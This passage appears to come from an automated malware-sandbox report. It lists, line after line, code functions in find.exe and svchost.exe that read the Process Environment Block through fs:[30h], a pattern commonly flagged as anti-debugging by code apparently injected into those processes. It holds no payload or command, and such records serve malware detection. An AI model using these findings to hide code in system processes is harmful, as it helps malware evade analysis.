Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03224120 mov eax, dword ptr fs:[00000030h] 2_2_03224120
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03224120 mov ecx, dword ptr fs:[00000030h] 2_2_03224120
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323513A mov eax, dword ptr fs:[00000030h] 2_2_0323513A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323513A mov eax, dword ptr fs:[00000030h] 2_2_0323513A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03209100 mov eax, dword ptr fs:[00000030h] 2_2_03209100
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03209100 mov eax, dword ptr fs:[00000030h] 2_2_03209100
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03209100 mov eax, dword ptr fs:[00000030h] 2_2_03209100
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0320C962 mov eax, dword ptr fs:[00000030h] 2_2_0320C962
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0320B171 mov eax, dword ptr fs:[00000030h] 2_2_0320B171
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0320B171 mov eax, dword ptr fs:[00000030h] 2_2_0320B171
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0322B944 mov eax, dword ptr fs:[00000030h] 2_2_0322B944
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0322B944 mov eax, dword ptr fs:[00000030h] 2_2_0322B944
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032361A0 mov eax, dword ptr fs:[00000030h] 2_2_032361A0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032361A0 mov eax, dword ptr fs:[00000030h] 2_2_032361A0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032869A6 mov eax, dword ptr fs:[00000030h] 2_2_032869A6
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032851BE mov eax, dword ptr fs:[00000030h] 2_2_032851BE
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032851BE mov eax, dword ptr fs:[00000030h] 2_2_032851BE
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032851BE mov eax, dword ptr fs:[00000030h] 2_2_032851BE
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032851BE mov eax, dword ptr fs:[00000030h] 2_2_032851BE
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0322C182 mov eax, dword ptr fs:[00000030h] 2_2_0322C182
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323A185 mov eax, dword ptr fs:[00000030h] 2_2_0323A185
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03232990 mov eax, dword ptr fs:[00000030h] 2_2_03232990
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0320B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0320B1E1
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0320B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0320B1E1
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0320B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0320B1E1
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032941E8 mov eax, dword ptr fs:[00000030h] 2_2_032941E8
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0321B02A mov eax, dword ptr fs:[00000030h] 2_2_0321B02A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0321B02A mov eax, dword ptr fs:[00000030h] 2_2_0321B02A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0321B02A mov eax, dword ptr fs:[00000030h] 2_2_0321B02A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0321B02A mov eax, dword ptr fs:[00000030h] 2_2_0321B02A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323002D mov eax, dword ptr fs:[00000030h] 2_2_0323002D
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323002D mov eax, dword ptr fs:[00000030h] 2_2_0323002D
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323002D mov eax, dword ptr fs:[00000030h] 2_2_0323002D
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323002D mov eax, dword ptr fs:[00000030h] 2_2_0323002D
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323002D mov eax, dword ptr fs:[00000030h] 2_2_0323002D
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D4015 mov eax, dword ptr fs:[00000030h] 2_2_032D4015
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D4015 mov eax, dword ptr fs:[00000030h] 2_2_032D4015
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03287016 mov eax, dword ptr fs:[00000030h] 2_2_03287016
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03287016 mov eax, dword ptr fs:[00000030h] 2_2_03287016
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03287016 mov eax, dword ptr fs:[00000030h] 2_2_03287016
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D1074 mov eax, dword ptr fs:[00000030h] 2_2_032D1074
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C2073 mov eax, dword ptr fs:[00000030h] 2_2_032C2073
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03220050 mov eax, dword ptr fs:[00000030h] 2_2_03220050
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03220050 mov eax, dword ptr fs:[00000030h] 2_2_03220050
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032320A0 mov eax, dword ptr fs:[00000030h] 2_2_032320A0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032320A0 mov eax, dword ptr fs:[00000030h] 2_2_032320A0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032320A0 mov eax, dword ptr fs:[00000030h] 2_2_032320A0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032320A0 mov eax, dword ptr fs:[00000030h] 2_2_032320A0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032320A0 mov eax, dword ptr fs:[00000030h] 2_2_032320A0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032320A0 mov eax, dword ptr fs:[00000030h] 2_2_032320A0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032490AF mov eax, dword ptr fs:[00000030h] 2_2_032490AF
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323F0BF mov ecx, dword ptr fs:[00000030h] 2_2_0323F0BF
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323F0BF mov eax, dword ptr fs:[00000030h] 2_2_0323F0BF
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323F0BF mov eax, dword ptr fs:[00000030h] 2_2_0323F0BF
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03209080 mov eax, dword ptr fs:[00000030h] 2_2_03209080
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03283884 mov eax, dword ptr fs:[00000030h] 2_2_03283884
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03283884 mov eax, dword ptr fs:[00000030h] 2_2_03283884
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032058EC mov eax, dword ptr fs:[00000030h] 2_2_032058EC
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0329B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0329B8D0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0329B8D0 mov ecx, dword ptr fs:[00000030h] 2_2_0329B8D0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0329B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0329B8D0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0329B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0329B8D0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0329B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0329B8D0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0329B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0329B8D0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03204F2E mov eax, dword ptr fs:[00000030h] 2_2_03204F2E
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03204F2E mov eax, dword ptr fs:[00000030h] 2_2_03204F2E
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323E730 mov eax, dword ptr fs:[00000030h] 2_2_0323E730
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D070D mov eax, dword ptr fs:[00000030h] 2_2_032D070D
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D070D mov eax, dword ptr fs:[00000030h] 2_2_032D070D
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323A70E mov eax, dword ptr fs:[00000030h] 2_2_0323A70E
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323A70E mov eax, dword ptr fs:[00000030h] 2_2_0323A70E
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0322F716 mov eax, dword ptr fs:[00000030h] 2_2_0322F716
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0329FF10 mov eax, dword ptr fs:[00000030h] 2_2_0329FF10
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0329FF10 mov eax, dword ptr fs:[00000030h] 2_2_0329FF10
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0321FF60 mov eax, dword ptr fs:[00000030h] 2_2_0321FF60
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D8F6A mov eax, dword ptr fs:[00000030h] 2_2_032D8F6A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0321EF40 mov eax, dword ptr fs:[00000030h] 2_2_0321EF40
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03218794 mov eax, dword ptr fs:[00000030h] 2_2_03218794
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03287794 mov eax, dword ptr fs:[00000030h] 2_2_03287794
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03287794 mov eax, dword ptr fs:[00000030h] 2_2_03287794
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03287794 mov eax, dword ptr fs:[00000030h] 2_2_03287794
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032437F5 mov eax, dword ptr fs:[00000030h] 2_2_032437F5
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0320E620 mov eax, dword ptr fs:[00000030h] 2_2_0320E620
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032BFE3F mov eax, dword ptr fs:[00000030h] 2_2_032BFE3F
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0320C600 mov eax, dword ptr fs:[00000030h] 2_2_0320C600
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0320C600 mov eax, dword ptr fs:[00000030h] 2_2_0320C600
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0320C600 mov eax, dword ptr fs:[00000030h] 2_2_0320C600
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03238E00 mov eax, dword ptr fs:[00000030h] 2_2_03238E00
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C1608 mov eax, dword ptr fs:[00000030h] 2_2_032C1608
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323A61C mov eax, dword ptr fs:[00000030h] 2_2_0323A61C
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323A61C mov eax, dword ptr fs:[00000030h] 2_2_0323A61C
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0321766D mov eax, dword ptr fs:[00000030h] 2_2_0321766D
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0322AE73 mov eax, dword ptr fs:[00000030h] 2_2_0322AE73
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0322AE73 mov eax, dword ptr fs:[00000030h] 2_2_0322AE73
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0322AE73 mov eax, dword ptr fs:[00000030h] 2_2_0322AE73
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0322AE73 mov eax, dword ptr fs:[00000030h] 2_2_0322AE73
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0322AE73 mov eax, dword ptr fs:[00000030h] 2_2_0322AE73
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03217E41 mov eax, dword ptr fs:[00000030h] 2_2_03217E41
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03217E41 mov eax, dword ptr fs:[00000030h] 2_2_03217E41
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03217E41 mov eax, dword ptr fs:[00000030h] 2_2_03217E41
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03217E41 mov eax, dword ptr fs:[00000030h] 2_2_03217E41
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03217E41 mov eax, dword ptr fs:[00000030h] 2_2_03217E41
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03217E41 mov eax, dword ptr fs:[00000030h] 2_2_03217E41
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D0EA5 mov eax, dword ptr fs:[00000030h] 2_2_032D0EA5
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D0EA5 mov eax, dword ptr fs:[00000030h] 2_2_032D0EA5
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D0EA5 mov eax, dword ptr fs:[00000030h] 2_2_032D0EA5
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032846A7 mov eax, dword ptr fs:[00000030h] 2_2_032846A7
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0329FE87 mov eax, dword ptr fs:[00000030h] 2_2_0329FE87
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032316E0 mov ecx, dword ptr fs:[00000030h] 2_2_032316E0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032176E2 mov eax, dword ptr fs:[00000030h] 2_2_032176E2
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03248EC7 mov eax, dword ptr fs:[00000030h] 2_2_03248EC7
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032BFEC0 mov eax, dword ptr fs:[00000030h] 2_2_032BFEC0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032336CC mov eax, dword ptr fs:[00000030h] 2_2_032336CC
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D8ED6 mov eax, dword ptr fs:[00000030h] 2_2_032D8ED6
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0320AD30 mov eax, dword ptr fs:[00000030h] 2_2_0320AD30
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03213D34 mov eax, dword ptr fs:[00000030h] 2_2_03213D34
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03213D34 mov eax, dword ptr fs:[00000030h] 2_2_03213D34
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03213D34 mov eax, dword ptr fs:[00000030h] 2_2_03213D34
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03213D34 mov eax, dword ptr fs:[00000030h] 2_2_03213D34
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03213D34 mov eax, dword ptr fs:[00000030h] 2_2_03213D34
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03213D34 mov eax, dword ptr fs:[00000030h] 2_2_03213D34
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03213D34 mov eax, dword ptr fs:[00000030h] 2_2_03213D34
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03213D34 mov eax, dword ptr fs:[00000030h] 2_2_03213D34
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03213D34 mov eax, dword ptr fs:[00000030h] 2_2_03213D34
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03213D34 mov eax, dword ptr fs:[00000030h] 2_2_03213D34
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03213D34 mov eax, dword ptr fs:[00000030h] 2_2_03213D34
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03213D34 mov eax, dword ptr fs:[00000030h] 2_2_03213D34
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03213D34 mov eax, dword ptr fs:[00000030h] 2_2_03213D34
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03234D3B mov eax, dword ptr fs:[00000030h] 2_2_03234D3B
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03234D3B mov eax, dword ptr fs:[00000030h] 2_2_03234D3B
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03234D3B mov eax, dword ptr fs:[00000030h] 2_2_03234D3B
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D8D34 mov eax, dword ptr fs:[00000030h] 2_2_032D8D34
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0328A537 mov eax, dword ptr fs:[00000030h] 2_2_0328A537
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0322C577 mov eax, dword ptr fs:[00000030h] 2_2_0322C577
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0322C577 mov eax, dword ptr fs:[00000030h] 2_2_0322C577
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03243D43 mov eax, dword ptr fs:[00000030h] 2_2_03243D43
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03283540 mov eax, dword ptr fs:[00000030h] 2_2_03283540
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03227D50 mov eax, dword ptr fs:[00000030h] 2_2_03227D50
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D05AC mov eax, dword ptr fs:[00000030h] 2_2_032D05AC
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D05AC mov eax, dword ptr fs:[00000030h] 2_2_032D05AC
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032335A1 mov eax, dword ptr fs:[00000030h] 2_2_032335A1
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03231DB5 mov eax, dword ptr fs:[00000030h] 2_2_03231DB5
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03231DB5 mov eax, dword ptr fs:[00000030h] 2_2_03231DB5
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03231DB5 mov eax, dword ptr fs:[00000030h] 2_2_03231DB5
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03232581 mov eax, dword ptr fs:[00000030h] 2_2_03232581
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03232581 mov eax, dword ptr fs:[00000030h] 2_2_03232581
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03232581 mov eax, dword ptr fs:[00000030h] 2_2_03232581
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03232581 mov eax, dword ptr fs:[00000030h] 2_2_03232581
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03202D8A mov eax, dword ptr fs:[00000030h] 2_2_03202D8A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03202D8A mov eax, dword ptr fs:[00000030h] 2_2_03202D8A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03202D8A mov eax, dword ptr fs:[00000030h] 2_2_03202D8A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03202D8A mov eax, dword ptr fs:[00000030h] 2_2_03202D8A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03202D8A mov eax, dword ptr fs:[00000030h] 2_2_03202D8A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323FD9B mov eax, dword ptr fs:[00000030h] 2_2_0323FD9B
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323FD9B mov eax, dword ptr fs:[00000030h] 2_2_0323FD9B
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0321D5E0 mov eax, dword ptr fs:[00000030h] 2_2_0321D5E0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0321D5E0 mov eax, dword ptr fs:[00000030h] 2_2_0321D5E0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032CFDE2 mov eax, dword ptr fs:[00000030h] 2_2_032CFDE2
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032CFDE2 mov eax, dword ptr fs:[00000030h] 2_2_032CFDE2
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032CFDE2 mov eax, dword ptr fs:[00000030h] 2_2_032CFDE2
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032CFDE2 mov eax, dword ptr fs:[00000030h] 2_2_032CFDE2
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032B8DF1 mov eax, dword ptr fs:[00000030h] 2_2_032B8DF1
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03286DC9 mov eax, dword ptr fs:[00000030h] 2_2_03286DC9
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03286DC9 mov eax, dword ptr fs:[00000030h] 2_2_03286DC9
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03286DC9 mov eax, dword ptr fs:[00000030h] 2_2_03286DC9
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03286DC9 mov ecx, dword ptr fs:[00000030h] 2_2_03286DC9
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03286DC9 mov eax, dword ptr fs:[00000030h] 2_2_03286DC9
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03286DC9 mov eax, dword ptr fs:[00000030h] 2_2_03286DC9
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323BC2C mov eax, dword ptr fs:[00000030h] 2_2_0323BC2C
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D740D mov eax, dword ptr fs:[00000030h] 2_2_032D740D
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D740D mov eax, dword ptr fs:[00000030h] 2_2_032D740D
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D740D mov eax, dword ptr fs:[00000030h] 2_2_032D740D
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03286C0A mov eax, dword ptr fs:[00000030h] 2_2_03286C0A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03286C0A mov eax, dword ptr fs:[00000030h] 2_2_03286C0A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03286C0A mov eax, dword ptr fs:[00000030h] 2_2_03286C0A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03286C0A mov eax, dword ptr fs:[00000030h] 2_2_03286C0A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C1C06 mov eax, dword ptr fs:[00000030h] 2_2_032C1C06
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C1C06 mov eax, dword ptr fs:[00000030h] 2_2_032C1C06
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C1C06 mov eax, dword ptr fs:[00000030h] 2_2_032C1C06
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C1C06 mov eax, dword ptr fs:[00000030h] 2_2_032C1C06
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C1C06 mov eax, dword ptr fs:[00000030h] 2_2_032C1C06
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C1C06 mov eax, dword ptr fs:[00000030h] 2_2_032C1C06
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C1C06 mov eax, dword ptr fs:[00000030h] 2_2_032C1C06
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C1C06 mov eax, dword ptr fs:[00000030h] 2_2_032C1C06
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C1C06 mov eax, dword ptr fs:[00000030h] 2_2_032C1C06
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C1C06 mov eax, dword ptr fs:[00000030h] 2_2_032C1C06
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C1C06 mov eax, dword ptr fs:[00000030h] 2_2_032C1C06
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C1C06 mov eax, dword ptr fs:[00000030h] 2_2_032C1C06
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C1C06 mov eax, dword ptr fs:[00000030h] 2_2_032C1C06
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C1C06 mov eax, dword ptr fs:[00000030h] 2_2_032C1C06
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0322746D mov eax, dword ptr fs:[00000030h] 2_2_0322746D
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323A44B mov eax, dword ptr fs:[00000030h] 2_2_0323A44B
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0329C450 mov eax, dword ptr fs:[00000030h] 2_2_0329C450
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0329C450 mov eax, dword ptr fs:[00000030h] 2_2_0329C450
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0321849B mov eax, dword ptr fs:[00000030h] 2_2_0321849B
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C14FB mov eax, dword ptr fs:[00000030h] 2_2_032C14FB
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03286CF0 mov eax, dword ptr fs:[00000030h] 2_2_03286CF0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03286CF0 mov eax, dword ptr fs:[00000030h] 2_2_03286CF0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03286CF0 mov eax, dword ptr fs:[00000030h] 2_2_03286CF0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D8CD6 mov eax, dword ptr fs:[00000030h] 2_2_032D8CD6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03753B7A mov eax, dword ptr fs:[00000030h] 14_2_03753B7A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03753B7A mov eax, dword ptr fs:[00000030h] 14_2_03753B7A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0372DB60 mov ecx, dword ptr fs:[00000030h] 14_2_0372DB60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0373FF60 mov eax, dword ptr fs:[00000030h] 14_2_0373FF60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F8F6A mov eax, dword ptr fs:[00000030h] 14_2_037F8F6A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F8B58 mov eax, dword ptr fs:[00000030h] 14_2_037F8B58
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0372F358 mov eax, dword ptr fs:[00000030h] 14_2_0372F358
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0372DB40 mov eax, dword ptr fs:[00000030h] 14_2_0372DB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0373EF40 mov eax, dword ptr fs:[00000030h] 14_2_0373EF40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375E730 mov eax, dword ptr fs:[00000030h] 14_2_0375E730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03724F2E mov eax, dword ptr fs:[00000030h] 14_2_03724F2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03724F2E mov eax, dword ptr fs:[00000030h] 14_2_03724F2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0374F716 mov eax, dword ptr fs:[00000030h] 14_2_0374F716
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E131B mov eax, dword ptr fs:[00000030h] 14_2_037E131B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037BFF10 mov eax, dword ptr fs:[00000030h] 14_2_037BFF10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037BFF10 mov eax, dword ptr fs:[00000030h] 14_2_037BFF10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F070D mov eax, dword ptr fs:[00000030h] 14_2_037F070D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F070D mov eax, dword ptr fs:[00000030h] 14_2_037F070D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375A70E mov eax, dword ptr fs:[00000030h] 14_2_0375A70E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375A70E mov eax, dword ptr fs:[00000030h] 14_2_0375A70E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037637F5 mov eax, dword ptr fs:[00000030h] 14_2_037637F5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037503E2 mov eax, dword ptr fs:[00000030h] 14_2_037503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037503E2 mov eax, dword ptr fs:[00000030h] 14_2_037503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037503E2 mov eax, dword ptr fs:[00000030h] 14_2_037503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037503E2 mov eax, dword ptr fs:[00000030h] 14_2_037503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037503E2 mov eax, dword ptr fs:[00000030h] 14_2_037503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037503E2 mov eax, dword ptr fs:[00000030h] 14_2_037503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A53CA mov eax, dword ptr fs:[00000030h] 14_2_037A53CA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037A53CA mov eax, dword ptr fs:[00000030h] 14_2_037A53CA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F5BA5 mov eax, dword ptr fs:[00000030h] 14_2_037F5BA5
